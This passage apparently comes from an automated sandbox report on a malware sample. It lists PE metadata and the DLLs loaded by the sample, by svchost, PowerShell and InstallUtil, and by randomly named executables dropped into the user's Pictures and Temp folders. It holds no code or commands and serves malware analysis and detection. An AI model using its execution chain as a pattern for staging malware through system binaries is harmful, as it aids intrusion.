                        Source: JmSupDwlA9Oqy8L5plKWP6Oj.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: Z7skxxTmXai6Pa9s6OHd8pTL.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: NRQOltVD0acQXnzUvV0AHMDa.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: file.exeStatic PE information: No import functions for PE file found
                        Source: file.exe, 00000000.00000000.1736862895.000001F8171C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewWorldOrderIsComingSoon.exeT vs file.exe
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: winmmbase.dll
